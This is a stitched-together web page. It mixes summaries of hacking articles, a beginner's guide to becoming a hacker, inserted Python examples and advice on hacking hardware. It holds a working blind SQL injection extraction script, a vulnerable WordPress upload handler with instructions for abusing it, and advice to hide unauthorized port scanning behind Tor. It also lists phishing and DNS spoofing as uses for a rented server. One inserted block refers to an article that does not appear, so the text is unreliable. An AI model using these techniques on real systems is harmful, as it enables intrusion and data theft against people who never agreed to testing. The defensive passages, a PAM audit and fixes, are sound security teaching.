    SSH is de facto the most popular and frequently used remote access protocol for Linux. Is there any need to talk about the reliability and security of the protocol through which the administrator connects to the server? But besides security settings, SSH has a heap of options that make working in the terminal more comfortable, pleasant and faster. The article is the most complete guide to using Secure Shell correctly, one hundred percent.

    The evil legacy of Windows. Conceptual methods of hacking Linux via a flash drive and protection against them



    What Windows user doesn't remember the trouble with flash drives and the annoying Autorun virus? Linux users have always looked down on this problem, saying it does not concern them. That is partly true, but not everything is as smooth as we would like. The penguin had its own problems: the functionally similar .autorun, a flaw in Adobe Acrobat Reader's font handling that allowed running anything from Nautilus, buggy drivers that mishandle removable media, and features that allow bypassing protection mechanisms such as AppArmor, ASLR, PIE and the NX bit. Interested? Then read the material and find out how it happened.

    *NIX backdoor of instant preparation. We implement into the authentication system of Linux, BSD and macOS


    Once the task of penetrating a machine is done, you need to gain a foothold on it without arousing suspicion, for example by creating a new account or planting a backdoor that, like a faithful servant, waits for commands from its owner. Even though *NIX systems are much more secure than other platforms, there is a very easy to implement and fairly stealthy method that surprisingly few people know about: modifying modules of the PAM authentication framework used by all modern UNIX systems. The material gives the theory of PAM modules, sample C++ code for writing your own backdoor, and techniques for embedding it into legitimate authentication modules.
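    The defender's side of that technique is worth a worked example. A PAM backdoor shows up in one of two places: as an extra line in a service file under /etc/pam.d (a module nobody packaged, or the one-liner `auth sufficient pam_permit.so`, which succeeds unconditionally and stops the stack right there), or as a patched module binary with the configuration left untouched. The following added example, not code from the article, audits the first case. Its three service files are constructed text, and `KNOWN_MODULES` is an assumed allowlist; on a real host you would read /etc/pam.d and build the allowlist from the package manager's file list.

```python
"""Audit /etc/pam.d-style stacks for modules that do not belong there.

Added example (not from the article). It works on constructed text so it
runs offline; on a real host read the files under /etc/pam.d instead and
build KNOWN_MODULES from the package manager's file list.
"""
import re
from typing import Dict, List

# Constructed sample of three service files. 'sshd' is clean; 'common-auth'
# loads a module no package ships; 'su' has the classic one-line backdoor,
# since pam_permit.so always succeeds and 'sufficient' stops the stack there.
SAMPLE_PAM_D: Dict[str, str] = {
    "sshd": """\
auth       required     pam_env.so
auth       sufficient   pam_unix.so nullok try_first_pass
auth       required     pam_deny.so
account    required     pam_unix.so
session    required     pam_limits.so
""",
    "common-auth": """\
# comment lines and blanks are ignored by PAM
auth       sufficient   /lib/security/pam_helper.so
auth       sufficient   pam_unix.so nullok try_first_pass
auth       required     pam_deny.so
""",
    "su": """\
auth       sufficient   pam_permit.so
auth       required     pam_unix.so
account    required     pam_unix.so
""",
}

# Assumed allowlist of module file names the distribution installs.
KNOWN_MODULES = {
    "pam_env.so", "pam_unix.so", "pam_deny.so", "pam_limits.so",
    "pam_permit.so", "pam_succeed_if.so", "pam_faildelay.so", "pam_rootok.so",
}

# type  control  module [args]; control may be a [bracketed] action list
LINE_RE = re.compile(
    r"^-?(?P<type>auth|account|password|session)\s+"
    r"(?P<control>\[[^\]]*\]|\S+)\s+"
    r"(?P<module>\S+)\s*(?P<args>.*)$"
)


def parse_pam(text: str) -> List[Dict[str, str]]:
    """Return one dict per effective line: type, control, module, args."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("@include"):
            continue
        m = LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def audit_pam(files: Dict[str, str], known=KNOWN_MODULES) -> List[str]:
    """Flag unknown modules, absolute-path loads, and auth stacks that
    pam_permit.so can short-circuit."""
    findings = []
    for service, text in files.items():
        for e in parse_pam(text):
            module = e["module"]
            name = module.rsplit("/", 1)[-1]
            if name not in known:
                findings.append(
                    f"{service}: unknown module {module} ({e['type']} {e['control']})")
                continue
            if module.startswith("/"):
                findings.append(
                    f"{service}: {name} loaded by absolute path {module}; "
                    f"verify it is the packaged file")
            if e["type"] == "auth" and e["control"] == "sufficient" and name == "pam_permit.so":
                findings.append(
                    f"{service}: 'auth sufficient pam_permit.so' accepts any password")
    return findings


if __name__ == "__main__":
    for finding in audit_pam(SAMPLE_PAM_D):
        print(finding)
```

    This catches configuration tampering only. The second variant, a trojaned pam_unix.so that quietly accepts a magic password, leaves every config line intact, so pair the audit with an integrity check of the module files against the package database (`rpm -V` on RPM systems, `debsums` on Debian-based ones) or against hashes recorded at build time.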

    Attacks on Tomcat. We study common attack methods on Apache Tomcat and ways to counter them


    Apache Tomcat is one of the most widely deployed servers in the world: it ranks sixth in popularity among web servers in the W3Techs ranking, which, of course, automatically makes it an attractive target for attackers. The default configuration does not withstand common attack methods, so the material provides specific recipes and recommendations, both for testing whether it can be hacked and for countering attackers who encroach on your holy of holies.

    We flex our muscles. Methods and tools for hacking MySQL databases


    It's no secret that MySQL is one of the most common DBMSs. It can be found everywhere, which is why database security matters so much: if an attacker gains access to the database, there is a high risk not only that all the information will be lost, but that the entire resource will be taken over. This material contains up-to-date information on the procedure for hacking and post-exploiting MySQL and all the most commonly used tricks and techniques, including those from the pentester's arsenal. After reading it, some will refresh the theory and others will learn something new. So go for it!

    Attack on the Oracle. Detailed guide to attack vectors on Oracle DB


    Needless to say that Oracle is a top-tier and widely used DBMS? All the most valuable data, from financial transactions to the results of military experiments or modelling of space objects, circulates in its depths. Like its younger brother MySQL, this DBMS is a real tasty morsel for a hacker, and no pentester will pass it by. The article presents the most important and typical attack vectors against Oracle database tables and program code: cracking user accounts, executing arbitrary code, injections into queries, scheduler bugs and much more. All sections come with illustrations and code examples. So, if you are involved in pentesting and/or are interested in Oracle internals, be sure to open it.

    Blind injections. Exotic rough injection


    While researching DBMS security, I came across an old but interesting piece on using injections in SQL queries. It describes tricks that may someday be useful to you in practice. The article starts with the necessary SQL theory, such as functions and query structure, then illustrates tricks with NULL, pre-queries to identify potential holes and INSERT tricks, and gives a general example of using the whole arsenal described. Having practised these techniques on a training database, you can confidently start testing a real database almost automatically, that is, as the title says, blindly!

    Hacking is finding vulnerabilities in a network or computer in order to gain access. Becoming a hacker is not easy, and in this article we cover the basics.

    To become a hacker you need deep knowledge of programming languages, hacking methods, vulnerability research, network design, operating systems, etc. You must also have a creative type of thinking: adapt quickly to the situation and find non-standard solutions.

    While the skills described above can be developed over time, understanding, say, MySQL or learning to work with PGP encryption takes a lot of study, and for a long time.

    To become a hacker you need:

    Learn and use a UNIX-like system, such as Ubuntu or macOS

    UNIX systems were originally intended for programmers developing software, not for users outside the IT field. They are the systems on which almost the entire Internet runs, since they are mostly used as servers (most often Debian and Ubuntu). You can't become a hacker without learning them and learning to use a terminal.

    For Windows users

    If you use Windows, there is good news: there is no need to delete your current system and format the disk. There are several options for working with Linux:

    1. Learn VirtualBox (a virtualization program). With it you can run one operating system inside another. It sounds scary, but the program is very useful.
    2. Install Linux alongside Windows (dual boot). If you do everything correctly, the bootloaders will not conflict. This is quite simple, and there are many manuals on the Internet.

    Learn HTML markup language

    If you are not yet familiar with programming (then I don't even understand what you are doing on this site), you have a great opportunity to start your journey by learning HyperText Markup Language. Whatever you see on a site, know that it is all HTML.

    Let me give an example using HTML, even though it is somewhat tied to PHP. At the beginning of 2015 a vulnerability was discovered in a WordPress theme that allows uploading arbitrary (executable) files to the server. The file in which the vulnerability was found is admin/upload-file.php. Here it is:

    <?php
    //Upload Security
    // Reconstructed from the article's listing (braces and quoting restored,
    // behaviour unchanged). The only "security" check is that the multipart
    // field carrying the file must be named md5 of the server's own IP
    // address, which is not a secret.
    $upload_security = md5($_SERVER['SERVER_ADDR']);
    $uploaddir = '../uploads/';

    if ($_FILES) :
        foreach ($_FILES as $file) :
            // the client's file name is kept; nothing checks extension or type
            $file = $uploaddir . basename($file['name']);
            if (move_uploaded_file($_FILES[$upload_security]['tmp_name'], $file)) {
                echo 'success';
            } else {
                echo 'error' . $_FILES[$upload_security]['tmp_name'];
            }
        endforeach;
    endif;

    To build a submission form for this file you need to know HTML: a multipart form whose file field is named md5 of the server's IP address, which anyone who knows the address can compute. There is no authentication, the original file name is kept (basename only strips the directory part) and nothing checks the extension, so an uploaded .php file lands in uploads/ and can be requested directly. By sending a file that, for example, collects all the passwords or gives access to the database, you are free to do whatever you want with the web service. The fix is equally plain: require an authenticated, authorized user, accept only an allowlist of extensions, give the stored file a random name, and keep uploads outside the web root.

    So, knowledge of HTML is needed in order to:

    1. Look for web resource vulnerabilities.
    2. Exploit these vulnerabilities.

    Learn several programming languages

    As we all know, to break the rules you first have to know them. The same goes for programming: to break someone's code, you must know how programming languages work and be able to program yourself. Some of the most recommended languages to learn:

    • Python: perhaps the best language for web development. Two large frameworks on which a huge number of web applications are built, Flask and Django, are written in it. The language is well designed and documented, and above all it is very easy to learn. Many developers also use Python for automation, from simple scripts to complete systems.
    • C++: a language used in industrial programming. It is taught in schools and universities, and servers are written in it. I recommend starting with it, because it covers all the principles of OOP; once you learn to work with it, you can easily master other languages.
    • JavaScript, jQuery: almost all websites use JS and jQuery, and you need to know which parts of a site depend on them, for example password entry forms. Some sites do not let you select and copy certain information, download a file or view content, yet to get around this it is often enough to disable JS in the browser. To do that you need to know: a) in what situations the site's operation (or protection) depends on it; b) how JavaScript is included and in what ways scripts can be blocked.
    • SQL: the most interesting one. All passwords and personal data are stored in databases that are queried with SQL. The most common database management system is MySQL. To learn how to use SQL injection, you need to know what SQL injection is, and to understand its essence, you need to know what SQL queries are, what their syntax is, how a database is structured, how data is stored, what tables are, and so on.
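    Both the SQL point above and the "Blind injections" article summarized earlier come down to one mechanism: when input is concatenated into a query, the attacker can append conditions, and even a yes/no answer is enough to read the whole database one bit at a time. The following added example is not from the article; it uses an in-memory SQLite database instead of MySQL so it runs offline (the SQLite functions used are `length`, `substr` and `unicode`; MySQL has `length`, `substr` and `ascii`/`ord`, and accepts `#` as well as `-- ` for the trailing comment). The table contents are constructed; `5f4dcc3b5aa765d61d8327deb882cf99` is simply the MD5 of "password".

```python
"""Boolean-based blind SQL injection, end to end, against a deliberately
vulnerable lookup function.

Added example, not from the article. The 'application' is an in-memory SQLite
database so the whole thing runs offline; the MySQL equivalents of the
functions used are noted inline.
"""
import sqlite3
from typing import Callable, Tuple

# Constructed data. 5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 of "password".
SEED = [("admin", "5f4dcc3b5aa765d61d8327deb882cf99"), ("bob", "deadbeef")]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pw_hash TEXT)")
    con.executemany("INSERT INTO users (login, pw_hash) VALUES (?, ?)", SEED)
    return con


def user_exists_vulnerable(con: sqlite3.Connection, login: str) -> bool:
    """Vulnerable: user input is glued into the query. The only thing the
    caller sees is yes/no, which is what makes the injection 'blind'."""
    sql = f"SELECT 1 FROM users WHERE login = '{login}'"
    return con.execute(sql).fetchone() is not None


def user_exists_fixed(con: sqlite3.Connection, login: str) -> bool:
    """Fixed: the value travels as a bound parameter, never as SQL text."""
    return con.execute("SELECT 1 FROM users WHERE login = ?", (login,)).fetchone() is not None


def make_oracle(con: sqlite3.Connection) -> Callable[[str], bool]:
    """Turn the yes/no endpoint into a function that answers any SQL condition.
    '-- ' comments out the closing quote (MySQL also accepts '#')."""
    def ask(condition: str) -> bool:
        return user_exists_vulnerable(con, f"admin' AND ({condition}) -- ")
    return ask


def extract(ask: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the text value of SQL expression `expr` one character at a time.

    Binary search on the code point costs ~7 requests per character instead of
    ~95 for a linear sweep. SQLite: length(), substr(), unicode();
    MySQL: length(), substr(), ascii()/ord().
    """
    lo, hi = 0, max_len                       # 1. find the length
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"length({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    out = []
    for i in range(1, length + 1):            # 2. each character, printable ASCII
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr({expr}, {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo() -> Tuple[str, int]:
    """Dump admin's password hash through the boolean oracle; returns the
    recovered value and how many requests it took."""
    con = make_db()
    ask = make_oracle(con)
    requests = 0

    def counting_ask(cond: str) -> bool:
        nonlocal requests
        requests += 1
        return ask(cond)

    value = extract(counting_ask, "(SELECT pw_hash FROM users WHERE login = 'admin')")
    return value, requests


if __name__ == "__main__":
    v, n = demo()
    print(f"recovered {v!r} in {n} requests")
```

    The request count (a few hundred for a 32-character value) is why blind injection is noisy in access logs and why tools like sqlmap automate exactly this loop. `user_exists_fixed` shows the whole fix: with a bound parameter the payload is compared as a literal login and never reaches the parser.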

    Learn networking

    You must clearly understand networks and how they work if you want to become a hacker. It is important to understand how networks are built, the difference between the TCP and UDP transport protocols, and so on. Find out what network you are on, learn how to configure it, and understand the possible attack vectors.

    With in-depth knowledge of various networks you will be able to exploit their vulnerabilities. You also need to understand how a web server and a website are designed and work.

    Learn cryptography

    This is an integral part of learning. It is necessary to understand how various algorithms work, for example the SHA-512 hash function and the ciphers implemented in OpenSSL. You also need to understand hashing and how it differs from encryption: a hash cannot be reversed, a ciphertext can be decrypted with the key. Cryptography is used everywhere: passwords, bank cards, cryptocurrencies, trading platforms, etc.

    Kali Linux: some useful software

    • Nmap: Nmap ("Network Mapper") is a free open-source program that comes pre-installed with Kali. It was written by Gordon Lyon (also known as Fyodor). It discovers hosts and services, thus creating a "map" of the network. It is used for network scanning and security auditing and can quickly scan large networks, although it works just as well against single hosts. Nmap uses raw IP packets to determine which hosts are up, which services (application name and version) they offer, which OS they run, what kinds of packet filters or firewalls are in use, and dozens of other characteristics.
    • Aircrack-ng: one of the most popular suites for cracking WEP and WPA/WPA2 keys. It contains tools for capturing packets and handshakes, deauthenticating connected clients, generating traffic, and brute-force and dictionary attacks on the captured handshake.

    Conclusion

    In this article we have covered the basics without which you are unlikely to become a hacker. As for employment: people involved in information security usually either work as freelancers, fulfilling orders from individuals, or work for a company, ensuring the security of stored data, doing system administration, and so on.

    Do you want to become a hacker? First, you need to decide what you will work on. In this article we will tell you how to choose a computer and OS.

    Hardware

    What should a hacker's computer be like?

    A computer is a must, but don't look for a super-cool gaming PC with unnecessary bells and whistles unless you are going to turn it into a mining rig or load its memory with character-by-character hash cracking. Ideally, have both a desktop and a portable machine.

    But what about additional devices?

    A specially configured router capable of intercepting open traffic while posing as an open hotspot. Just think how many people use Wi-Fi, how popular it is nowadays, and how that can be exploited. Such a hotspot can be set up on an ordinary laptop, but it is also worth looking at the WiFi Pineapple, a device designed specifically for this and shipped with a bunch of useful utilities: URLSnarf, DNS Spoof, etc.

    HackRF, a unique gadget for radio amateurs and enthusiasts, can both receive and transmit radio signals in the range from 1 MHz to 6 GHz with a bandwidth of up to 20 MHz.

    A Bluetooth sniffer. It plugs into a computer's USB port and runs on an ARM Cortex-M3 processor. It works in promiscuous mode, i.e. it captures everything it can hear on the air, not just traffic addressed to it.

    Video card for pentest

    In information security a video card is used to brute-force hashes. A hash is the result of processing data with a hash function. Hashes let you store something in place of data that would be unsafe to keep in clear text: identical input always gives the identical hash, but the original data cannot be recovered from it.

    This property is used, for example, on websites. Password hashes are stored there, and when you enter your credentials the hashes are compared: if the hash of the entered password matches the stored one, you get access. If a database of hashes somehow falls into a hacker's hands, he cannot log in as one of the users with the hash alone, because the site will ask for the password.

    As mentioned above, the original data cannot be recovered from a hash, but it can be brute-forced: take a candidate password, compute its hash and compare it with what we have. If they match, we have found the password. Otherwise take the next candidate and repeat.
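    That loop is the whole of offline cracking, and the "salted hashes" article summarized earlier is about the one thing that changes its cost: whether the hashes of different users can be attacked with the same computation. The following added example, not code from the article, runs the loop over constructed users and a five-word constructed wordlist, once against plain MD5 and once against MD5 of salt||password, and counts the hash evaluations each needs. MD5 is used because the page discusses it, not as a recommendation; the `slow_hash` function shows the kind of salted, iterated KDF (PBKDF2 here) that should be used instead.

```python
"""Why salt matters for offline cracking, and what it does not fix.

Added example, not from the article. Wordlist, users and passwords are
constructed; MD5 is used because the article discusses it, not because it
should be used for passwords.
"""
import hashlib
import hmac
import os
from typing import Dict, List, Tuple

WORDLIST: List[str] = ["123456", "password", "qwerty", "letmein", "hunter2"]


def unsalted_hash(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def salted_hash(password: str, salt: bytes) -> str:
    """md5(salt || password): still a fast hash, but no longer shareable
    between users or precomputable in a rainbow table."""
    return hashlib.md5(salt + password.encode()).hexdigest()


def slow_hash(password: str, salt: bytes, iterations: int = 100_000) -> str:
    """What to use instead: a salted, iterated KDF makes each guess cost
    `iterations` HMAC evaluations for the attacker as well."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def crack_unsalted(targets: Dict[str, str], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Hash each candidate once, then look every user up in the table: the
    work is len(wordlist) regardless of how many hashes were dumped, and users
    who chose the same password fall together."""
    table = {unsalted_hash(w): w for w in wordlist}
    found = {user: table[h] for user, h in targets.items() if h in table}
    return found, len(wordlist)


def crack_salted(targets: Dict[str, Tuple[str, str]],
                 wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """With a per-user salt the table cannot be shared, so the cost is the sum
    over users of the guesses tried for each."""
    found: Dict[str, str] = {}
    work = 0
    for user, (salt_hex, h) in targets.items():
        salt = bytes.fromhex(salt_hex)
        for w in wordlist:
            work += 1
            if hmac.compare_digest(salted_hash(w, salt), h):
                found[user] = w
                break
    return found, work


def make_dumps() -> Tuple[Dict[str, str], Dict[str, Tuple[str, str]]]:
    """Constructed 'leaked' databases: the same accounts stored unsalted and salted."""
    users = {"alice": "hunter2", "bob": "hunter2", "carol": "password"}
    unsalted_db = {u: unsalted_hash(p) for u, p in users.items()}
    salted_db: Dict[str, Tuple[str, str]] = {}
    for u, p in users.items():
        salt = os.urandom(8)
        salted_db[u] = (salt.hex(), salted_hash(p, salt))
    return unsalted_db, salted_db


if __name__ == "__main__":
    udb, sdb = make_dumps()
    print("unsalted:", crack_unsalted(udb, WORDLIST))
    print("salted:  ", crack_salted(sdb, WORDLIST))
```

    Two things are visible in the output. Alice and Bob share an unsalted hash, so one computation cracks both and the repeated value alone tells an attacker they use the same password; salting removes both effects, but the salted run still finishes in a dozen MD5 calls because MD5 itself is cheap. Salt only multiplies the attacker's work by the number of users; a slow KDF is what multiplies it per guess, which is the point the GPU section below makes from the other side.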

    This can be done on a CPU, and there is plenty of software for it. But it turned out that a video card handles the task much faster: brute force on a GPU is orders of magnitude faster, which means the chances of cracking the hash are correspondingly higher.

    AMD, Nvidia GeForce and Intel HD Graphics cards are all widely used, but Intel HD Graphics does not always work well.
    The real choice is between GeForce and AMD. The big disadvantage of AMD is that its drivers do not work well with some Linux distributions; hashcat, for example, supports AMD only through the AMDGPU-Pro driver, which works with newer cards. So before buying AMD, check the list of supported Linux distributions.

    Why is it necessary to brute force hashes:

    • For penetration testing of web applications.
    • For hacking Wi-Fi.
    • To crack the password of encrypted files, storage media, wallets, documents.

    RAM

    It's better to have plenty of RAM. Most programs work fine even on a low-powered computer, but pentesting inside a virtual machine imposes its own requirements.

    CPU

    If you are going to brute-force hashes on the processor, remember that the more powerful the processor, the faster the brute force. A powerful processor also lets you work comfortably in virtual machines. But most programs, except those that do brute force, have no special processor requirements.

    Penetration tester computer on VPS/VDS

    A VPS/VDS (virtual private/dedicated server) is something like a virtual machine, except that instead of running it yourself you rent the resources from a hosting provider.
    Why pay for something you can do in VirtualBox for free? A VPS guarantees a constant Internet connection and a number of other important benefits.

    By the way, use Tor if you are doing vulnerability analysis or port scanning without permission.

    VPS will definitely come in handy in the following cases:

    • Website cloning.
    • Complete search (brute force).
    • Scanning applications for vulnerabilities and subnets.
    • Phishing.
    • DNS spoofing.

    Also, Virtual Private Server will allow you to organize a web server, mail server, cloud storage, VPN, etc.

    ARM computer

    This is a low-powered computer that also consumes little energy. It is useful if you need a machine running permanently, without a VPS and without huge electricity bills.

    It is suitable for:

    • Sustained attacks.
    • Monitoring radio traffic of various radios, creating your own GSM base station.
    • Proxy servers with Tor.

    Operating system

    In general you can work on both Windows and Linux. Most programs feel at home on either operating system. But those who use Linux have a number of advantages:

    1. Many distributions come with specialized programs already installed and configured. Yes, learning them takes time, but if you try to install and then configure the same tools on Windows, fiddling with Linux will seem like a breeze.
    2. By working with Linux you not only learn to use it, you also learn what pentesting is for.
    3. The number of guides and other materials. Most books describe working with Linux.

    Kali Linux deserves special attention: it is the most popular distribution in the field of computer security and a favorite of hackers.

    With Kali Linux hacking becomes easier, because the user gets a complete toolkit (over 300 pre-installed utilities) plus the ability to install additional programs.